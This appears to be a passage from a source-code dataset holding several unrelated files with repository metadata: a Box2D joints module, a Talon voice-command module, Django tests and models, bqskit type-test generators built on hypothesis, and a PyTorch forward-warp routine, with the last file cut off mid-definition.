| 33.5 | 81 | 0.734186 | 156 | 1,407 | 6.371795 | 0.435897 | 0.065392 | 0.018109 | 0.05835 | 0.070423 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001767 | 0.195451 | 1,407 | 41 | 82 | 34.317073 | 0.876325 | 0.113717 | 0 | 0 | 0 | 0 | 0.038079 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12 | false | 0 | 0.2 | 0.08 | 0.76 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
339ef85148fe55aaa28cf0f86e5f3b80b5277dee | 1,964 | py | Python | pypybox2d/joints/__init__.py | the-mba/Progra-Super-Mario | 90dc2a4ba815732b6e92652c7f8bb4a345d25e91 | [
"MIT"
] | null | null | null | pypybox2d/joints/__init__.py | the-mba/Progra-Super-Mario | 90dc2a4ba815732b6e92652c7f8bb4a345d25e91 | [
"MIT"
] | null | null | null | pypybox2d/joints/__init__.py | the-mba/Progra-Super-Mario | 90dc2a4ba815732b6e92652c7f8bb4a345d25e91 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# C++ version Copyright (c) 2006-2011 Erin Catto http://www.box2d.org
# Python port by Ken Lauer / http://pybox2d.googlecode.com
#
# This software is provided 'as-is', without any express or implied
# warranty. In no event will the authors be held liable for any damages
# arising from the use of this software.
# Permission is granted to anyone to use this software for any purpose,
# including commercial applications, and to alter it and redistribute it
# freely, subject to the following restrictions:
# 1. The origin of this software must not be misrepresented; you must not
# claim that you wrote the original software. If you use this software
# in a product, an acknowledgment in the product documentation would be
# appreciated but is not required.
# 2. Altered source versions must be plainly marked as such, and must not be
# misrepresented as being the original software.
# 3. This notice may not be removed or altered from any source distribution.
from __future__ import absolute_import
__all__ = ('Joint', 'DistanceJoint', 'RevoluteJoint', 'FrictionJoint',
'PrismaticJoint', 'WeldJoint', 'RopeJoint', 'WheelJoint',
'MouseJoint', 'PulleyJoint', 'GearJoint',
'INACTIVE_LIMIT', 'AT_LOWER_LIMIT', 'AT_UPPER_LIMIT', 'EQUAL_LIMITS',
'ALLOWED_STRETCH')
__version__ = "$Revision: 352 $"
__date__ = "$Date: 2011-07-14 20:14:23 -0400 (Thu, 14 Jul 2011) $"
# $Source$
from .joint import (INACTIVE_LIMIT, AT_LOWER_LIMIT, AT_UPPER_LIMIT, EQUAL_LIMITS, ALLOWED_STRETCH)
from .joint import Joint
from .distance import DistanceJoint
from .revolute import RevoluteJoint
from .friction import FrictionJoint
from .prismatic import PrismaticJoint
from .weld import WeldJoint
from .rope import RopeJoint
from .wheel import WheelJoint
from .mouse import MouseJoint
from .pulley import PulleyJoint
from .gear import GearJoint
| 42.695652 | 99 | 0.735234 | 266 | 1,964 | 5.31203 | 0.541353 | 0.042463 | 0.019816 | 0.032555 | 0.087757 | 0.087757 | 0.087757 | 0.087757 | 0.087757 | 0.087757 | 0 | 0.025593 | 0.184318 | 1,964 | 45 | 100 | 43.644444 | 0.856429 | 0.5 | 0 | 0 | 0 | 0.05 | 0.277293 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.65 | 0 | 0.65 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
33a5d6a0778311e0740b6ce7a927d2f68fa7baf5 | 380 | py | Python | lang/tags/data_null.py | ghouston/knausj_talon | 098bb3e89261b19f4b2eda0ca0696f398c50e931 | [
"MIT"
] | 5 | 2020-02-16T13:39:10.000Z | 2020-02-19T19:29:56.000Z | lang/tags/data_null.py | ghouston/knausj_talon | 098bb3e89261b19f4b2eda0ca0696f398c50e931 | [
"MIT"
] | null | null | null | lang/tags/data_null.py | ghouston/knausj_talon | 098bb3e89261b19f4b2eda0ca0696f398c50e931 | [
"MIT"
] | 2 | 2020-02-19T15:10:44.000Z | 2020-02-19T16:55:38.000Z | from talon import Context, Module
ctx = Context()
mod = Module()
mod.tag("code_data_null", desc="Tag for enabling commands relating to null")
@mod.action_class
class Actions:
def code_insert_null():
"""Inserts null"""
def code_insert_is_null():
"""Inserts check for null"""
def code_insert_is_not_null():
"""Inserts check for non-null"""
| 20 | 76 | 0.665789 | 53 | 380 | 4.54717 | 0.509434 | 0.087137 | 0.161826 | 0.141079 | 0.157676 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 380 | 18 | 77 | 21.111111 | 0.803333 | 0.163158 | 0 | 0 | 0 | 0 | 0.18543 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.111111 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
33a772f892d4ed50cf326d5af75052977fcc4c7b | 695 | py | Python | body/tests/test_medicine.py | dylanjboyd/bodytastic | ee2299ba523c8c6b627028d70ab32b6da97cb2ea | [
"MIT"
] | null | null | null | body/tests/test_medicine.py | dylanjboyd/bodytastic | ee2299ba523c8c6b627028d70ab32b6da97cb2ea | [
"MIT"
] | 81 | 2022-03-04T23:46:02.000Z | 2022-03-19T13:06:46.000Z | body/tests/test_medicine.py | dylanjboyd/bodytastic | ee2299ba523c8c6b627028d70ab32b6da97cb2ea | [
"MIT"
] | null | null | null | from body.tests.login_test_case import LoginTestCase
from body.tests.model_helpers import create_ledger_entry, create_medicine
from freezegun import freeze_time
from django.utils.timezone import make_aware, datetime
@freeze_time(make_aware(datetime(2022, 3, 1)))
class MedicineTests(LoginTestCase):
def test_ledger_recalculates(self):
"""
Recalculating the current balance of a medicine correctly uses ledger entries to do so.
"""
medicine = create_medicine(self.user)
create_ledger_entry(medicine, 4)
create_ledger_entry(medicine, -1)
medicine.recalculate_balance_from_ledger()
self.assertEqual(medicine.current_balance, 3)
| 38.611111 | 95 | 0.755396 | 88 | 695 | 5.727273 | 0.534091 | 0.071429 | 0.10119 | 0.099206 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015679 | 0.174101 | 695 | 17 | 96 | 40.882353 | 0.862369 | 0.12518 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.083333 | false | 0 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
33a9396a5c748b360eebc18de6c808b8faa43521 | 20,818 | py | Python | bqskit/utils/test/types.py | BQSKit/bqskit | 8471f28299a7fb49a2d9d82b24e49c331c9dec22 | [
"BSD-3-Clause-LBNL"
] | 13 | 2021-05-26T21:32:26.000Z | 2022-03-15T17:48:10.000Z | bqskit/utils/test/types.py | BQSKit/bqskit | 8471f28299a7fb49a2d9d82b24e49c331c9dec22 | [
"BSD-3-Clause-LBNL"
] | 20 | 2021-05-26T20:17:15.000Z | 2022-02-27T20:04:10.000Z | bqskit/utils/test/types.py | BQSKit/bqskit | 8471f28299a7fb49a2d9d82b24e49c331c9dec22 | [
"BSD-3-Clause-LBNL"
] | 2 | 2021-10-05T16:00:47.000Z | 2021-10-08T01:30:06.000Z | """This module contains functions to generate strategies from annotations."""
from __future__ import annotations
import collections
import inspect
import sys
from itertools import chain
from itertools import combinations
from typing import Any
from typing import Callable
from typing import Iterable
from typing import Sequence
import numpy as np
import pytest
from hypothesis import given
from hypothesis.extra.numpy import complex_number_dtypes
from hypothesis.extra.numpy import floating_dtypes
from hypothesis.extra.numpy import from_dtype
from hypothesis.strategies import booleans
from hypothesis.strategies import complex_numbers
from hypothesis.strategies import data
from hypothesis.strategies import dictionaries
from hypothesis.strategies import floats
from hypothesis.strategies import integers
from hypothesis.strategies import iterables
from hypothesis.strategies import just
from hypothesis.strategies import lists
from hypothesis.strategies import one_of
from hypothesis.strategies import SearchStrategy
from hypothesis.strategies import sets
from hypothesis.strategies import text
from hypothesis.strategies import tuples
from bqskit.utils.test.strategies import circuit_location_likes
from bqskit.utils.test.strategies import circuit_locations
from bqskit.utils.test.strategies import circuit_points
from bqskit.utils.test.strategies import circuit_regions
from bqskit.utils.test.strategies import circuits
from bqskit.utils.test.strategies import cycle_intervals
from bqskit.utils.test.strategies import everything_except
from bqskit.utils.test.strategies import gates
from bqskit.utils.test.strategies import operations
from bqskit.utils.test.strategies import unitaries
from bqskit.utils.test.strategies import unitary_likes
def _powerset(iterable: Iterable[Any]) -> Iterable[Any]:
"""
Calculate the powerset of an iterable.
Examples:
>>> list(powerset([1,2,3]))
... [() (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)]
References:
https://stackoverflow.com/questions/18035595/powersets-in-python-using-
itertools.
"""
s = list(iterable)
return chain.from_iterable(combinations(s, r) for r in range(len(s)))
def _split_generic_arguments(args: str) -> list[str]:
"""Split a generic's type arguments up."""
comma_indices = []
num_open_brackets = 0
for i, char in enumerate(args):
if char == '[':
num_open_brackets += 1
elif char == ']':
num_open_brackets -= 1
elif char == ',' and num_open_brackets == 0:
comma_indices.append(i)
if len(comma_indices) == 0:
return [args]
to_return: list[str] = []
last_index = 0
for comma_index in comma_indices:
to_return.append(args[last_index: comma_index])
last_index = comma_index + 1
to_return.append(args[last_index:])
return to_return
def type_annotation_to_valid_strategy(annotation: str) -> SearchStrategy[Any]:
"""Convert a type annotation into a hypothesis strategy."""
strategies: list[SearchStrategy[Any]] = []
annotation = annotation.replace('RealVector', 'Sequence[float]')
for type_str in annotation.split('|'):
type_str = type_str.strip()
if type_str == 'None':
strategies.append(just(None))
elif type_str == 'int':
strategies.append(integers())
elif type_str == 'float':
strategies.append(floats())
strategies.append(floating_dtypes().flatmap(from_dtype))
elif type_str == 'complex':
strategies.append(complex_numbers())
strategies.append(complex_number_dtypes().flatmap(from_dtype))
elif type_str == 'bool':
strategies.append(booleans())
elif type_str == 'str':
strategies.append(text())
elif type_str == 'Any':
strategies.append(just(None))
elif type_str.lower().startswith('tuple'):
inner_strategies = []
for arg in _split_generic_arguments(type_str[6:-1]):
inner_strategies.append(type_annotation_to_valid_strategy(arg))
strategies.append(tuples(*inner_strategies))
elif type_str.lower().startswith('dict'):
args = _split_generic_arguments(type_str[5:-1])
key_strat = type_annotation_to_valid_strategy(args[0])
val_strat = type_annotation_to_valid_strategy(args[1])
strategies.append(dictionaries(key_strat, val_strat))
elif type_str.lower().startswith('mapping'):
args = _split_generic_arguments(type_str[8:-1])
key_strat = type_annotation_to_valid_strategy(args[0])
val_strat = type_annotation_to_valid_strategy(args[1])
strategies.append(dictionaries(key_strat, val_strat))
elif type_str.lower().startswith('list'):
arg_strat = type_annotation_to_valid_strategy(type_str[5:-1])
strategies.append(lists(arg_strat))
elif type_str.lower().startswith('set'):
arg_strat = type_annotation_to_valid_strategy(type_str[4:-1])
strategies.append(sets(arg_strat))
elif type_str.lower().startswith('sequence'):
arg_strat = type_annotation_to_valid_strategy(type_str[9:-1])
strategies.append(lists(arg_strat))
elif type_str.lower().startswith('iterable'):
arg_strat = type_annotation_to_valid_strategy(type_str[9:-1])
strategies.append(iterables(arg_strat))
elif type_str.lower().startswith('intervallike'):
strat = type_annotation_to_valid_strategy('Tuple[int, int]')
strategies.append(strat)
strategies.append(cycle_intervals())
elif type_str.lower().startswith('cycleinterval'):
strategies.append(cycle_intervals())
elif type_str.lower().startswith('circuitpointlike'):
strat = type_annotation_to_valid_strategy('Tuple[int, int]')
strategies.append(strat)
strategies.append(circuit_points())
elif type_str.lower().startswith('circuitpoint'):
strategies.append(circuit_points())
elif type_str.lower().startswith('circuitregionlike'):
strat = type_annotation_to_valid_strategy('dict[int, IntervalLike]')
strategies.append(strat)
strategies.append(circuit_regions())
elif type_str.lower().startswith('circuitregion'):
strategies.append(circuit_regions())
elif type_str.lower().startswith('unitarylike'):
strategies.append(unitary_likes())
elif type_str.lower().startswith('unitarymatrix'):
strategies.append(unitaries())
elif type_str.lower().startswith('gate'):
strategies.append(gates())
elif type_str.lower().startswith('operation'):
strategies.append(operations())
elif type_str.lower().startswith('circuitlocationlike'):
strategies.append(circuit_locations())
elif type_str.lower().startswith('circuitlocation'):
strategies.append(circuit_location_likes())
elif type_str.lower().startswith('circuit'):
strategies.append(circuits(max_gates=1))
else:
raise ValueError(f'Cannot generate strategy for type: {type_str}')
return one_of(strategies)
def type_annotation_to_invalid_strategy(annotation: str) -> SearchStrategy[Any]:
"""Convert a type annotation into an invalid hypothesis strategy."""
strategies: list[SearchStrategy[Any]] = []
types_to_avoid: set[type] = set()
tuple_valids: dict[int, set[SearchStrategy[Any]]] = {}
tuple_invalids: dict[int, set[SearchStrategy[Any]]] = {}
dict_key_valids: set[SearchStrategy[Any]] = set()
dict_key_invalids: set[SearchStrategy[Any]] = set()
dict_val_valids: set[SearchStrategy[Any]] = set()
dict_val_invalids: set[SearchStrategy[Any]] = set()
list_invalids: set[SearchStrategy[Any]] = set()
set_invalids: set[SearchStrategy[Any]] = set()
iterable_invalids: set[SearchStrategy[Any]] = set()
annotation = annotation.replace('RealVector', 'Sequence[float]')
for type_str in annotation.split('|'):
type_str = type_str.strip()
if type_str == 'None':
types_to_avoid.add(type(None))
elif type_str == 'int':
types_to_avoid.add(int)
types_to_avoid.add(np.byte)
types_to_avoid.add(np.short)
types_to_avoid.add(np.intc)
types_to_avoid.add(np.longlong)
types_to_avoid.add(np.int8)
types_to_avoid.add(np.int16)
types_to_avoid.add(np.int32)
types_to_avoid.add(np.int64)
elif type_str == 'float':
types_to_avoid.add(float)
types_to_avoid.add(np.half)
types_to_avoid.add(np.single)
types_to_avoid.add(np.double)
types_to_avoid.add(np.longdouble)
types_to_avoid.add(np.float32)
types_to_avoid.add(np.float64)
elif type_str == 'complex':
types_to_avoid.add(complex)
types_to_avoid.add(np.csingle)
types_to_avoid.add(np.cdouble)
types_to_avoid.add(np.clongdouble)
types_to_avoid.add(np.complex64)
types_to_avoid.add(np.complex128)
elif type_str == 'bool':
types_to_avoid.add(bool)
types_to_avoid.add(np.bool_)
elif type_str == 'str':
types_to_avoid.add(str)
elif type_str == 'Any':
continue
elif type_str.lower().startswith('tuple'):
args = _split_generic_arguments(type_str[6:-1])
if len(args) not in tuple_valids:
tuple_valids[len(args)] = set()
tuple_invalids[len(args)] = set()
for arg in args:
valid_strat = type_annotation_to_valid_strategy(arg)
invalid_strat = type_annotation_to_invalid_strategy(arg)
tuple_valids[len(args)].add(valid_strat)
tuple_invalids[len(args)].add(invalid_strat)
types_to_avoid.add(tuple)
elif type_str.lower().startswith('dict'):
args = _split_generic_arguments(type_str[5:-1])
dict_key_valids.add(type_annotation_to_valid_strategy(args[0]))
dict_key_invalids.add(type_annotation_to_valid_strategy(args[1]))
dict_val_valids.add(type_annotation_to_invalid_strategy(args[0]))
dict_val_invalids.add(type_annotation_to_invalid_strategy(args[1]))
types_to_avoid.add(dict)
types_to_avoid.add(map)
elif type_str.lower().startswith('mapping'):
args = _split_generic_arguments(type_str[8:-1])
dict_key_valids.add(type_annotation_to_valid_strategy(args[0]))
dict_key_invalids.add(type_annotation_to_valid_strategy(args[1]))
dict_val_valids.add(type_annotation_to_invalid_strategy(args[0]))
dict_val_invalids.add(type_annotation_to_invalid_strategy(args[1]))
types_to_avoid.add(dict)
types_to_avoid.add(map)
elif type_str.lower().startswith('list'):
arg_strat = type_annotation_to_invalid_strategy(type_str[5:-1])
list_invalids.add(arg_strat)
types_to_avoid.add(list)
elif type_str.lower().startswith('set'):
arg_strat = type_annotation_to_invalid_strategy(type_str[4:-1])
set_invalids.add(arg_strat)
types_to_avoid.add(set)
types_to_avoid.add(collections.abc.MutableSet)
elif type_str.lower().startswith('sequence'):
arg_strat = type_annotation_to_invalid_strategy(type_str[9:-1])
list_invalids.add(arg_strat)
types_to_avoid.add(Sequence)
types_to_avoid.add(list)
types_to_avoid.add(tuple)
types_to_avoid.add(bytearray)
types_to_avoid.add(bytes)
elif type_str.lower().startswith('iterable'):
arg_strat = type_annotation_to_invalid_strategy(type_str[9:-1])
iterable_invalids.add(arg_strat)
types_to_avoid.add(Sequence)
types_to_avoid.add(list)
types_to_avoid.add(tuple)
types_to_avoid.add(Iterable)
types_to_avoid.add(set)
types_to_avoid.add(frozenset)
types_to_avoid.add(dict)
types_to_avoid.add(str)
types_to_avoid.add(bytearray)
types_to_avoid.add(bytes)
types_to_avoid.add(collections.abc.MutableSet)
types_to_avoid.add(enumerate)
types_to_avoid.add(map)
types_to_avoid.add(range)
types_to_avoid.add(reversed)
elif type_str.lower().startswith('intervallike'):
types_to_avoid.add(tuple)
elif type_str.lower().startswith('cycleinterval'):
continue
elif type_str.lower().startswith('circuitpointlike'):
types_to_avoid.add(tuple)
elif type_str.lower().startswith('circuitpoint'):
continue
elif type_str.lower().startswith('circuitregionlike'):
types_to_avoid.add(dict)
elif type_str.lower().startswith('circuitregion'):
continue
elif type_str.lower().startswith('circuitlocationlike'):
types_to_avoid.add(int)
types_to_avoid.add(Sequence)
types_to_avoid.add(Iterable)
types_to_avoid.add(list)
types_to_avoid.add(tuple)
types_to_avoid.add(collections.abc.MutableSet)
types_to_avoid.add(enumerate)
types_to_avoid.add(range)
types_to_avoid.add(reversed)
elif type_str.lower().startswith('circuitlocation'):
continue
elif type_str.lower().startswith('unitarylike'):
types_to_avoid.add(np.ndarray)
elif type_str.lower().startswith('unitarymatrix'):
continue
elif type_str.lower().startswith('gate'):
continue
elif type_str.lower().startswith('operation'):
continue
elif type_str.lower().startswith('circuit'):
continue
else:
raise ValueError(f'Cannot generate strategy for type: {type_str}')
strategies.append(everything_except(tuple(types_to_avoid)))
for tuple_len in tuple_valids:
for valid_set in _powerset(list(range(tuple_len))): # (), (0,), (1,)
strategy_builder = []
for i in range(tuple_len):
if i in valid_set:
strat = one_of(list(tuple_valids[tuple_len]))
strategy_builder.append(strat)
else:
strat = one_of(list(tuple_invalids[tuple_len]))
strategy_builder.append(strat)
strategies.append(tuples(*strategy_builder))
if len(dict_val_invalids) > 0:
strategies.append(
dictionaries(
one_of(list(dict_key_valids)),
one_of(list(dict_val_invalids)),
min_size=1,
),
)
strategies.append(
dictionaries(
one_of(list(dict_key_invalids)),
one_of(list(dict_val_valids)),
min_size=1,
),
)
strategies.append(
dictionaries(
one_of(list(dict_key_invalids)),
one_of(list(dict_val_invalids)),
min_size=1,
),
)
if len(list_invalids) > 0:
strategies.append(lists(one_of(list(list_invalids)), min_size=1))
if len(set_invalids) > 0:
strategies.append(sets(one_of(list(set_invalids)), min_size=1))
if len(iterable_invalids) > 0:
strategies.append(
iterables(
one_of(
list(iterable_invalids),
),
min_size=1,
),
)
return one_of(strategies)
def invalid_type_test(
func_to_test: Callable[..., Any],
other_allowed_errors: list[type] = [],
) -> Callable[..., Callable[..., None]]:
"""
Decorator to generate invalid type tests.
A valid type test ensures that a function called with incorrect types
does raise a TypeError.
Examples:
>>> class Foo:
... def foo(self, x: int, y: int) -> None:
... if not is_integer(x):
... raise TypeError("")
... if not is_integer(y):
... raise TypeError("")
>>> class TestFoo:
... @invalid_type_test(Foo().foo)
... def test_foo_invalid_type(self) -> None:
... pass
>>> @invalid_type_test(Foo().foo)
... def test_foo_invalid_type(self) -> None:
... pass
"""
if sys.version_info[0] == 3 and sys.version_info[1] < 9:
return lambda x: x
valids = []
invalids = []
for id, param in inspect.signature(func_to_test).parameters.items():
if param.annotation == inspect._empty: # type: ignore
raise ValueError(
'Need type annotation to generate invalid type tests.',
)
valids.append(type_annotation_to_valid_strategy(param.annotation))
invalids.append(type_annotation_to_invalid_strategy(param.annotation))
strategies = []
for valid_set in _powerset(list(range(len(valids)))):
strategy_builder = []
for i in range(len(valids)):
if i in valid_set:
strategy_builder.append(valids[i])
else:
strategy_builder.append(invalids[i])
strategies.append(tuples(*strategy_builder))
def inner(f: Callable[..., Any]) -> Callable[..., None]:
if 'self' in inspect.signature(f).parameters:
@pytest.mark.parametrize('strategy', strategies)
@given(data=data())
def invalid_type_test(self: Any, strategy: Any, data: Any) -> None:
args = data.draw(strategy)
with pytest.raises((TypeError,) + tuple(other_allowed_errors)):
func_to_test(*args)
return invalid_type_test
else:
@pytest.mark.parametrize('strategy', strategies)
@given(data=data())
def invalid_type_test(strategy: Any, data: Any) -> None:
args = data.draw(strategy)
with pytest.raises((TypeError,) + tuple(other_allowed_errors)):
func_to_test(*args)
return invalid_type_test
return inner
def valid_type_test(
func_to_test: Callable[..., Any],
) -> Callable[..., Callable[..., None]]:
"""
Decorator to generate valid type tests.
A valid type test ensures that a function called with correct types
does not raise a TypeError.
Examples:
>>> class Foo:
... def foo(self, x: int, y: int) -> None:
... if not is_integer(x):
... raise TypeError("")
... if not is_integer(y):
... raise TypeError("")
>>> class TestFoo:
... @valid_type_test(Foo().foo)
... def test_foo_valid_type(self) -> None:
... pass
>>> @valid_type_test(Foo().foo)
... def test_foo_valid_type(self) -> None:
... pass
"""
if sys.version_info[0] == 3 and sys.version_info[1] < 9:
return lambda x: x
strategies = []
for id, param in inspect.signature(func_to_test).parameters.items():
if param.annotation == inspect._empty: # type: ignore
raise ValueError(
'Need type annotation to generate invalid type tests.',
)
strategies.append(type_annotation_to_valid_strategy(param.annotation))
strategy = tuples(*strategies)
def inner(f: Callable[..., Any]) -> Callable[..., None]:
if 'self' in inspect.signature(f).parameters:
@given(data=strategy)
def valid_type_test(self: Any, data: Any) -> None:
try:
func_to_test(*data)
except TypeError:
assert False, 'Valid types caused TypeError.'
except Exception:
pass
return valid_type_test
else:
@given(data=strategy)
def valid_type_test(data: Any) -> None:
try:
func_to_test(*data)
except TypeError:
assert False, 'Valid types caused TypeError.'
except Exception:
pass
return valid_type_test
return inner
| 35.893103 | 80 | 0.619944 | 2,423 | 20,818 | 5.069336 | 0.101114 | 0.043312 | 0.06741 | 0.08182 | 0.745176 | 0.663926 | 0.518603 | 0.459904 | 0.446634 | 0.395262 | 0 | 0.007074 | 0.273417 | 20,818 | 579 | 81 | 35.955095 | 0.804972 | 0.083533 | 0 | 0.576555 | 1 | 0 | 0.044647 | 0 | 0 | 0 | 0 | 0 | 0.004785 | 1 | 0.028708 | false | 0.004785 | 0.098086 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
33a9e48d845125b9644014be228bb6ef28ca1951 | 4,743 | py | Python | Forward_Warp/python/forward_warp_python.py | hologerry/Forward-Warp | 82a32a372383b3c69f9666cb5b8189dbfb05d328 | [
"MIT"
] | 81 | 2019-07-04T20:51:34.000Z | 2022-03-26T15:58:42.000Z | Forward_Warp/python/forward_warp_python.py | wbhu/Forward-Warp | 90e7e32f2c0e666ffc029b7b274b30b3a45cd3ce | [
"MIT"
] | 9 | 2020-05-04T04:59:16.000Z | 2021-12-21T19:06:31.000Z | Forward_Warp/python/forward_warp_python.py | wbhu/Forward-Warp | 90e7e32f2c0e666ffc029b7b274b30b3a45cd3ce | [
"MIT"
] | 9 | 2019-09-04T02:09:12.000Z | 2021-11-27T09:31:49.000Z | import torch
from torch.nn import Module, Parameter
from torch.autograd import Function
class Forward_Warp_Python:
@staticmethod
def forward(im0, flow, interpolation_mode):
im1 = torch.zeros_like(im0)
B = im0.shape[0]
H = im0.shape[2]
W = im0.shape[3]
if interpolation_mode == 0:
for b in range(B):
for h in range(H):
for w in range(W):
x = w + flow[b, h, w, 0]
y = h + flow[b, h, w, 1]
nw = (int(torch.floor(x)), int(torch.floor(y)))
ne = (nw[0]+1, nw[1])
sw = (nw[0], nw[1]+1)
se = (nw[0]+1, nw[1]+1)
p = im0[b, :, h, w]
if nw[0] >= 0 and se[0] < W and nw[1] >= 0 and se[1] < H:
nw_k = (se[0]-x)*(se[1]-y)
ne_k = (x-sw[0])*(sw[1]-y)
sw_k = (ne[0]-x)*(y-ne[1])
se_k = (x-nw[0])*(y-nw[1])
im1[b, :, nw[1], nw[0]] += nw_k*p
im1[b, :, ne[1], ne[0]] += ne_k*p
im1[b, :, sw[1], sw[0]] += sw_k*p
im1[b, :, se[1], se[0]] += se_k*p
else:
round_flow = torch.round(flow)
for b in range(B):
for h in range(H):
for w in range(W):
x = w + int(round_flow[b, h, w, 0])
y = h + int(round_flow[b, h, w, 1])
if x >= 0 and x < W and y >= 0 and y < H:
im1[b, :, y, x] = im0[b, :, h, w]
return im1
@staticmethod
def backward(grad_output, im0, flow, interpolation_mode):
B = grad_output.shape[0]
C = grad_output.shape[1]
H = grad_output.shape[2]
W = grad_output.shape[3]
im0_grad = torch.zeros_like(grad_output)
flow_grad = torch.empty([B, H, W, 2])
if interpolation_mode == 0:
for b in range(B):
for h in range(H):
for w in range(W):
x = w + flow[b, h, w, 0]
y = h + flow[b, h, w, 1]
x_f = int(torch.floor(x))
y_f = int(torch.floor(y))
x_c = x_f+1
y_c = y_f+1
nw = (x_f, y_f)
ne = (x_c, y_f)
sw = (x_f, y_c)
se = (x_c, y_c)
p = im0[b, :, h, w]
if nw[0] >= 0 and se[0] < W and nw[1] >= 0 and se[1] < H:
nw_k = (se[0]-x)*(se[1]-y)
ne_k = (x-sw[0])*(sw[1]-y)
sw_k = (ne[0]-x)*(y-ne[1])
se_k = (x-nw[0])*(y-nw[1])
nw_grad = grad_output[b, :, nw[1], nw[0]]
ne_grad = grad_output[b, :, ne[1], ne[0]]
sw_grad = grad_output[b, :, sw[1], sw[0]]
se_grad = grad_output[b, :, se[1], se[0]]
im0_grad[b, :, h, w] += nw_k*nw_grad
im0_grad[b, :, h, w] += ne_k*ne_grad
im0_grad[b, :, h, w] += sw_k*sw_grad
im0_grad[b, :, h, w] += se_k*se_grad
flow_grad_x = torch.zeros(C)
flow_grad_y = torch.zeros(C)
flow_grad_x -= (y_c-y)*p*nw_grad
flow_grad_y -= (x_c-x)*p*nw_grad
flow_grad_x += (y_c-y)*p*ne_grad
flow_grad_y -= (x-x_f)*p*ne_grad
flow_grad_x -= (y-y_f)*p*sw_grad
flow_grad_y += (x_c-x)*p*sw_grad
flow_grad_x += (y-y_f)*p*se_grad
flow_grad_y += (x-x_f)*p*se_grad
flow_grad[b, h, w, 0] = torch.sum(flow_grad_x)
flow_grad[b, h, w, 1] = torch.sum(flow_grad_y)
else:
round_flow = torch.round(flow)
for b in range(B):
for h in range(H):
for w in range(W):
x = w + int(round_flow[b, h, w, 0])
y = h + int(round_flow[b, h, w, 1])
if x >= 0 and x < W and y >= 0 and y < H:
im0_grad[b, :, h, w] = grad_output[b, :, y, x]
return im0_grad, flow_grad
| 46.5 | 81 | 0.356525 | 668 | 4,743 | 2.360778 | 0.080838 | 0.024096 | 0.036145 | 0.03551 | 0.558022 | 0.462904 | 0.426126 | 0.409639 | 0.344959 | 0.344959 | 0 | 0.044055 | 0.507063 | 4,743 | 101 | 82 | 46.960396 | 0.630453 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020408 | false | 0 | 0.030612 | 0 | 0.081633 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
33b43ed36a9638956d846bca8d46fb665ecc2a68 | 2,295 | py | Python | e/mail-relay/web/apps/localized_mail/models.py | zhouli121018/nodejsgm | 0ccbc8acf61badc812f684dd39253d55c99f08eb | [
"MIT"
] | null | null | null | e/mail-relay/web/apps/localized_mail/models.py | zhouli121018/nodejsgm | 0ccbc8acf61badc812f684dd39253d55c99f08eb | [
"MIT"
] | 18 | 2020-06-05T18:17:40.000Z | 2022-03-11T23:25:21.000Z | e/mail-relay/web/apps/localized_mail/models.py | zhouli121018/nodejsgm | 0ccbc8acf61badc812f684dd39253d55c99f08eb | [
"MIT"
] | null | null | null | #coding=utf-8
import os
from django.db import models
from django.contrib.auth.models import User
from django.conf import settings
from apps.core.models import Customer
CHECK_RESULT = (
('', '--'),
('high_risk', u'高危邮件'),
('sender_blacklist', u'发件黑'),
('keyword_blacklist', u'内容黑'),
('subject_blacklist', u'主题黑'),
('subject_and_keyword', u'主题和内容关键字'),
('cyber_spam', u'CYBER-Spam'),
('spamassassin', u'垃邮(spamassassin)'),
('error', u'检测出错'),
('c_sender_blacklist', u'发件人黑名单'),
)
MAIL_STATE = (
('', '--'),
('review', u'等待审核'),
('pass', u'审核已通过'),
('reject', u'审核已拒绝'),
('passing', u'审核通过中'),
('rejecting', u'审核拒绝中'),
)
MAIL_ORIGIN = (
('', '--'),
